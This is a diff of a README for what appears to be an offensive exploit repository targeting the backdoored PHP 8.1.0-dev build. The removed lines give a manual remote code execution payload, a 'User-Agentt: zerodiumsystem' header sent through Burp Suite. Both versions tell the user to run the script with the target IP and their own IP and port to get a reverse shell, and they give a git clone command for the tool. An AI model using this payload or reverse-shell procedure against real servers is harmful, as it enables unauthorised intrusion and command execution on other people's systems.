PenTestical/PHP-8.1.0-dev_RCE/README.md

 ## Usage

-You can exploit this manually by adding the

-`User-Agentt: zerodiumsystem('ls');`

-header in Burp Suite or just run the script with the host IP, your own IP + port (for the reverse shell) and enjoy your shell:
+ Run the script with the host IP, your own IP + port (for the reverse shell) and enjoy your shell:

 `$ git clone https://github.com/PenTestical/PHP-8.1.0-dev_RCE && cd PHP-8.1.0-dev_RCE/`